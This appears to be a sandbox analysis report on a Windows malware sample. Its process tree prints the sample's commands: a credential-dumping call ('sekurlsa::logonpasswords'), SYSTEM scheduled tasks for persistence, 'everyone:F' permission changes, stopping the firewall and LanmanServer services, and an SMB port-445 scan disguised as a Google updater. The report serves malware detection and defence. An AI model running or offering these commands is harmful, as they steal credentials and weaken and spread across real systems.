Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe Token: SeDebugPrivilege 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe -
Suspicious use of SetWindowsHookEx 10 IoCs
Processes:
2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exewimnat.exenslfoo.exe2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exepid process 3476 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 3476 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 3760 wimnat.exe 3588 nslfoo.exe 5788 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 5788 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 6040 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe 6040 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 2544 wrote to memory of 4624 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe cmd.exe PID 2544 wrote to memory of 4624 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe cmd.exe PID 2544 wrote to memory of 4624 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe cmd.exe PID 2544 wrote to memory of 1344 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe cmd.exe PID 2544 wrote to memory of 1344 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe cmd.exe PID 2544 wrote to memory of 1344 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe cmd.exe PID 2544 wrote to memory of 3224 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe cmd.exe PID 2544 wrote to memory of 3224 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe cmd.exe PID 2544 wrote to memory of 3224 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe cmd.exe PID 2544 wrote to memory of 3848 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe cmd.exe PID 2544 wrote to memory of 3848 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe cmd.exe PID 2544 wrote to memory of 3848 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe cmd.exe PID 2544 wrote to memory of 2156 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe cmd.exe PID 2544 wrote to memory of 2156 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe cmd.exe PID 2544 wrote to memory of 2156 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe cmd.exe PID 2544 wrote to memory of 408 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe cmd.exe PID 2544 wrote to memory of 408 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe cmd.exe PID 2544 wrote to memory of 408 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe cmd.exe PID 4624 wrote to memory of 1992 4624 cmd.exe vfshost.exe PID 4624 wrote to memory of 1992 4624 cmd.exe vfshost.exe PID 2544 wrote to memory of 2200 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe cmd.exe PID 2544 wrote to memory of 2200 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe cmd.exe PID 2544 wrote to memory of 2200 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe cmd.exe PID 2544 wrote to memory of 1692 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe cmd.exe PID 2544 wrote to memory of 1692 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe cmd.exe PID 2544 wrote to memory of 1692 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe cmd.exe PID 2544 wrote to memory of 492 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe taskmgr.exe PID 2544 wrote to memory of 492 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe taskmgr.exe PID 3848 wrote to memory of 4872 3848 cmd.exe cmd.exe PID 3848 wrote to memory of 4872 3848 cmd.exe cmd.exe PID 3848 wrote to memory of 4872 3848 cmd.exe cmd.exe PID 3224 wrote to memory of 2508 3224 cmd.exe cmd.exe PID 3224 wrote to memory of 2508 3224 cmd.exe cmd.exe PID 3224 wrote to memory of 2508 3224 cmd.exe cmd.exe PID 1344 wrote to memory of 268 1344 cmd.exe cmd.exe PID 1344 wrote to memory of 268 1344 cmd.exe cmd.exe PID 1344 wrote to memory of 268 1344 cmd.exe cmd.exe PID 2544 wrote to memory of 3760 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe wimnat.exe PID 2544 wrote to memory of 3760 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe wimnat.exe PID 2544 wrote to memory of 3760 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe wimnat.exe PID 1692 wrote to memory of 4988 1692 cmd.exe sc.exe PID 1692 wrote to memory of 4988 1692 cmd.exe sc.exe PID 1692 wrote to memory of 4988 1692 cmd.exe sc.exe PID 408 wrote to memory of 3840 408 cmd.exe net.exe PID 408 wrote to memory of 3840 408 cmd.exe net.exe PID 408 wrote to memory of 3840 408 cmd.exe net.exe PID 3224 wrote to memory of 2400 3224 cmd.exe schtasks.exe PID 3224 wrote to memory of 2400 3224 cmd.exe schtasks.exe PID 3224 wrote to memory of 2400 3224 cmd.exe schtasks.exe PID 2200 wrote to memory of 1000 2200 cmd.exe net.exe PID 2200 wrote to memory of 1000 2200 cmd.exe net.exe PID 2200 wrote to memory of 1000 2200 cmd.exe net.exe PID 1344 wrote to memory of 1328 1344 cmd.exe schtasks.exe PID 1344 wrote to memory of 1328 1344 cmd.exe schtasks.exe PID 1344 wrote to memory of 1328 1344 cmd.exe schtasks.exe PID 2156 wrote to memory of 3928 2156 cmd.exe net.exe PID 2156 wrote to memory of 3928 2156 cmd.exe net.exe PID 2156 wrote to memory of 3928 2156 cmd.exe net.exe PID 3848 wrote to memory of 3076 3848 cmd.exe schtasks.exe PID 3848 wrote to memory of 3076 3848 cmd.exe schtasks.exe PID 3848 wrote to memory of 3076 3848 cmd.exe schtasks.exe PID 2544 wrote to memory of 1828 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe cmd.exe PID 2544 wrote to memory of 1828 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe cmd.exe PID 2544 wrote to memory of 1828 2544 2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe cmd.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe"C:\Users\Admin\AppData\Local\Temp\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe"1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exeC:\Windows\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe1⤵
- Executes dropped EXE
- Sets file execution options in registry
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\InfusedAppe\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\InfusedAppe\Corporate\log.txt2⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\InfusedAppe\Corporate\vfshost.exeC:\Windows\InfusedAppe\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "MiscfostNsi" /ru system /tr "cmd /c C:\Windows\ime\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "MiscfostNsi" /ru system /tr "cmd /c C:\Windows\ime\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "WwANsvc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\Networks\taskmgr.exe /p everyone:F"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "WwANsvc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\Networks\taskmgr.exe /p everyone:F"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "HomeGroupProvider" /ru system /tr "cmd /c echo Y|cacls C:\Windows\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe /p everyone:F"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "HomeGroupProvider" /ru system /tr "cmd /c echo Y|cacls C:\Windows\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe /p everyone:F"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.execmd /c net stop LanmanServer2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop LanmanServer3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop LanmanServer4⤵
-
C:\Windows\TEMP\Networks\taskmgr.exeC:\Windows\TEMP\Networks\taskmgr.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c sc config LanmanServer start= disabled2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\sc.exesc config LanmanServer start= disabled3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
-
C:\Windows\TEMP\wimnat.exeC:\Windows\TEMP\wimnat.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\InfusedAppe\Priess\scan.bat2⤵
-
C:\Windows\InfusedAppe\Priess\GoogleCdoeUpdate.exeGoogleCdoeUpdate.exe tcp 10.127.0.1 10.127.255.255 445 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Windows\SysWOW64\nslfoo.exeC:\Windows\SysWOW64\nslfoo.exe1⤵
- Executes dropped EXE
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe1⤵
-
C:\Windows\ime\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exeC:\Windows\ime\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\Networks\taskmgr.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\Networks\taskmgr.exe /p everyone:F2⤵
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
C:\Windows\system32\cacls.execacls C:\Windows\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe /p everyone:F2⤵
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\Networks\taskmgr.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\Networks\taskmgr.exe /p everyone:F2⤵
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
C:\Windows\system32\cacls.execacls C:\Windows\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe /p everyone:F2⤵
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe1⤵
-
C:\Windows\ime\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exeC:\Windows\ime\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Windows\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exeFilesize
4.7MB
MD5e2f922fc8900ca88a305101ed7820c53
SHA16465e375ef71d1df58f532c6cd3db60f9534e69e
SHA2562efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770
SHA512f903de003ea31cbe7deb2f87fd94a46e172534665f7bfa370d2c541971b349ee31c7763c6e34788705941fa4006bd73cb1c974e3e23e54106068ca6413247475
-
C:\Windows\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exeFilesize
4.7MB
MD5e2f922fc8900ca88a305101ed7820c53
SHA16465e375ef71d1df58f532c6cd3db60f9534e69e
SHA2562efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770
SHA512f903de003ea31cbe7deb2f87fd94a46e172534665f7bfa370d2c541971b349ee31c7763c6e34788705941fa4006bd73cb1c974e3e23e54106068ca6413247475
-
C:\Windows\IME\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exeFilesize
4.7MB
MD5e2f922fc8900ca88a305101ed7820c53
SHA16465e375ef71d1df58f532c6cd3db60f9534e69e
SHA2562efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770
SHA512f903de003ea31cbe7deb2f87fd94a46e172534665f7bfa370d2c541971b349ee31c7763c6e34788705941fa4006bd73cb1c974e3e23e54106068ca6413247475
-
C:\Windows\IME\2efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770.exeFilesize
4.7MB
MD5e2f922fc8900ca88a305101ed7820c53
SHA16465e375ef71d1df58f532c6cd3db60f9534e69e
SHA2562efa9c2db1fdbbcf0ef54e985ced0908b8b9a95248a3b2d9c254f737b8abd770
SHA512f903de003ea31cbe7deb2f87fd94a46e172534665f7bfa370d2c541971b349ee31c7763c6e34788705941fa4006bd73cb1c974e3e23e54106068ca6413247475
-
C:\Windows\InfusedAppe\Corporate\vfshost.exeFilesize
381KB
MD5fd5efccde59e94eec8bb2735aa577b2b
SHA151aaa248dc819d37f8b8e3213c5bdafc321a8412
SHA256441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45
SHA51274a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3
-
C:\Windows\InfusedAppe\Corporate\vfshost.exeFilesize
381KB
MD5fd5efccde59e94eec8bb2735aa577b2b
SHA151aaa248dc819d37f8b8e3213c5bdafc321a8412
SHA256441430308fa25ec04fd913666f5e0748fdb10743984656d55acc26542e5fff45
SHA51274a7eebdee9d25a306be83cb3568622ea9c1b557a8fbb86945331209bdc884e48113c3d01aac5347d88b8d2f786f8929aa6bb55d80516f3b4f9cc0f18362e8e3
-
C:\Windows\InfusedAppe\Priess\GoogleCdoeUpdate.exeFilesize
105KB
MD56f66a335570b54739990afe1b3f7abd2
SHA1245aafe4f98ee9ea32800affd433a1446112b9e2
SHA2569f843d4a0ec79659e9a45bcede49a4776813deb8d35c7d6b74f17b72d5a34eed
SHA512daa55e9e6a9d9d6ca378a3017170fada5d14c8c6fe5ff7907c4c520b2abbfb9d6212c4258ea99e4b688a52882313dcecc642a58dde854883b799817c28a7dc90
-
C:\Windows\InfusedAppe\Priess\GoogleCdoeUpdate.exeFilesize
105KB
MD56f66a335570b54739990afe1b3f7abd2
SHA1245aafe4f98ee9ea32800affd433a1446112b9e2
SHA2569f843d4a0ec79659e9a45bcede49a4776813deb8d35c7d6b74f17b72d5a34eed
SHA512daa55e9e6a9d9d6ca378a3017170fada5d14c8c6fe5ff7907c4c520b2abbfb9d6212c4258ea99e4b688a52882313dcecc642a58dde854883b799817c28a7dc90
-
C:\Windows\InfusedAppe\Priess\ip.txtFilesize
193B
MD546d5f0e13f2b0c205bb92bec9e6c6481
SHA1b3643a06acbe70dabacfcbdf4990972b3f8e706e
SHA25616cc30ea61ba43dd1e77dd9439ed9496486a975db0ca98851ec3ea7e563ef8a8
SHA5126bd7a0c652e09716022237fb15cf60951c1ef8f49dbcbdd4753da1dd1efc57200fa6a233034e8ffe6e659d1be65c62ff776bdaf1aaeed544dbcc426211a86a77
-
C:\Windows\InfusedAppe\Priess\scan.batFilesize
134B
MD52b2796f90932dc3c24db746b874c3e5a
SHA18c179ae387fafe5331dd5ad6a57632b92173fad8
SHA256ddd2f544dd188599ea343567aa4fd2caf2cac8173a0acc67cfca667f90eaddd0
SHA5128046816ed9dbbec32e0347b224397eb9f97c317b8589e90c228f8f67b73a133a8b9c02394e08d49b6c3f48d7e1109be734c50d856ce4ea3cc3d198dee3f4012a
-
C:\Windows\SysWOW64\nslfoo.exeFilesize
72KB
MD52334bb8baf5e062683d8ec67b7ac531e
SHA15419ddccabaa0a0b98fd6783c8341012c40db522
SHA2566c310b9829fe5fac50b0ea752242b456b3b86462dee46624337715831deb8b2e
SHA512ee0e3f619f0294e3e67e324cab582dd790ba2c15ae08365c0481fd07e32949428c9f4f4872572f52df02be3cd558c78be8af5696da4731b528019ad6706770f8
-
C:\Windows\SysWOW64\nslfoo.exeFilesize
72KB
MD52334bb8baf5e062683d8ec67b7ac531e
SHA15419ddccabaa0a0b98fd6783c8341012c40db522
SHA2566c310b9829fe5fac50b0ea752242b456b3b86462dee46624337715831deb8b2e
SHA512ee0e3f619f0294e3e67e324cab582dd790ba2c15ae08365c0481fd07e32949428c9f4f4872572f52df02be3cd558c78be8af5696da4731b528019ad6706770f8
-
C:\Windows\TEMP\Networks\config.jsonFilesize
750B
MD53bb2c47f0a437a02c2817753b3becf1f
SHA1b1d4e62ba0675a57001a8c63349c9cb0af505711
SHA2562e7c49b882f6f841891bcc82da771d5ec5a69fb02be336d6f7fd306c268ddb42
SHA51239642aded900c47c878bda620442f1e708ea4c85742b264cdd98e19e1df4d00c6cb77eb326999c8b8cfad7775c4e4cb35dd0e78cac068e3968275140fa6484b2
-
C:\Windows\TEMP\Networks\taskmgr.exeFilesize
481KB
MD5458a2b86b2c610cc66b3aa081c45584b
SHA11771b2d47e29076ef9caaadc520cd3f73cbcbae2
SHA256ec616b6475f04802a385a5d1841843e48d7dc115eaf7bc6221ebe4f2d6803e7e
SHA5126d8758f4adc7c75e9daa84dea269c2d768e34644326fac8b836a4ee9eaf5ff7dbba23d0d4c1b424e2f1058e9c3ce0012d4acb7ed455d95c21581400fbf9355ac
-
C:\Windows\TEMP\wimnat.exeFilesize
72KB
MD52334bb8baf5e062683d8ec67b7ac531e
SHA15419ddccabaa0a0b98fd6783c8341012c40db522
SHA2566c310b9829fe5fac50b0ea752242b456b3b86462dee46624337715831deb8b2e
